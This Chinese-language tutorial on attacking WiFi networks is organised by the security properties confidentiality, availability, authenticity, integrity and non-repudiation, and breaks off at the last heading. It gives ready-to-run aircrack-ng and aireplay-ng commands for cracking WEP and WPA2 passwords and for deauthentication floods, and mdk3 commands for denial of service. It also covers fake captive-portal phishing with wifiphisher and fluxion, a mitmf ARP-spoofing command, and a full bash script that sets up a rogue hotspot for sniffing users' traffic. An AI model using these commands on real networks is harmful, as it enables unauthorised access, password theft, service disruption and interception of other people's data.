我們攻擊WIFI的第壹個思路就是從保密性出發,我們希望從無線系統中獲取用戶的明文數據。首先,我們知道WIFI的的認證加密主要有以下四種方式:OPEN(無加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI沒有采取認證加密措施,任意用戶均可鏈接WIFI,用戶數據在BSS(基本服務集)中明文傳輸,惡意用戶沒有任何門檻就可連接,然後通過中間人攻擊即可獲取用戶的數據(SSL、SSH等需要其他工具)。如下圖所示:
WEP、WPA、WPA2認證加密模式的WIFI需要破解獲取密碼,然後通過中間人或直接嗅探的方式獲取用戶明文數據。步驟就不詳述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕獲ivs數據包
aireplay-ng -3 -b 目標AP的MAC -h 某壹個連接該AP的station的MAC wlan1mon #發送ARP包獲取加速獲取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目標AP的MAC -c AP所在chanle wlan1mon #嗅探無線數據,抓取handshake包
aireplay-ng -0 5 -a 目標AP的MAC -c 某壹連接AP的station的MAC wlan1mon #發送deauth包,更快的獲取handshake
aircrack-ng -w 妳的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密碼
密碼破解成功後即可連接AP,通過中間人的方式獲取用戶明文數據,或者直接用wireshark抓取加密包,然後通過airdecap-ng工具解密,然後用wireshark讀取已經解密的數據包。
破解WPA、WPA2不壹定成功,取決於妳字典是否強大,此時我們可以想辦法誘騙用戶主動輸入WIFI密碼,比如我們創建壹個和目標AP具有同樣ESSID的軟AP,用戶可以連接上,單在瀏覽網頁時會彈出壹個虛假的認證頁面,告訴用戶必須輸入WIFI的密碼,用戶只要輸入密碼我們即可獲取。可以利用fluxion、wifiphisher等工具實現。
wifiphisher將用戶輸入的密碼當做WIFI的密碼,但此密碼並沒有去驗證,如果用戶輸入錯誤,也會提示出該密碼。
而fluxion會將用戶輸入的密碼與handshake校驗,成功方認為獲取到密碼。
2.可用性
通過使目標用戶無法使用WIFI來破壞無線系統的可用性,通常通過DOS攻擊來實現,比如發送大量的deauth包來迫使用戶station與AP解除認證、連接。
aireplay -0 100 -a 目標AP的MAC -c攻擊的station的MAC wlan1mon #發送大量的deauth包,迫使目標station無法連接AP
mdk3 wlan1mon a -a 攻擊AP的MAC #mdk3可以偽造大量的station與AP連接,從而耗盡AP的資源造成DOS攻擊
3.真實性
(1)惡意用戶進入無線系統後,可通過中間人攻擊獲取或修改用戶數據。
ARP欺騙或DNS欺騙,ettercap工具非常方便。下面采用mitmf工具通過ARP欺騙將目標瀏覽網頁中的所有圖片上下顛倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通過driftnet工具抓取目標瀏覽網頁時的圖片
driftnet -i wlan0
當然還可以利用中間人攻擊做很多事情,比如獲取cookie,嵌入js,結合beef進壹步攻擊等等。。。
(2)偽造AP進行釣魚攻擊
airbase -ng -e airmon wlan1mon #創建釣魚熱點
然後通過下面的腳本開啟dhcp服務器(必須先安裝isc-dhcp-server),開啟路由,開啟系統轉發,開啟防火墻nat等。
1 #!/bin/bash 2 3 echo '配置釣魚熱點...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待啟動dhcp服務器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此時用戶可以不用密碼即可連接airmon熱點,並可以上網,但此時可以通過嗅探at0網卡獲取用戶數據。
4.完整性
篡改用戶數據,在WIFI攻擊這塊貌似用處不大。
5.不可抵賴性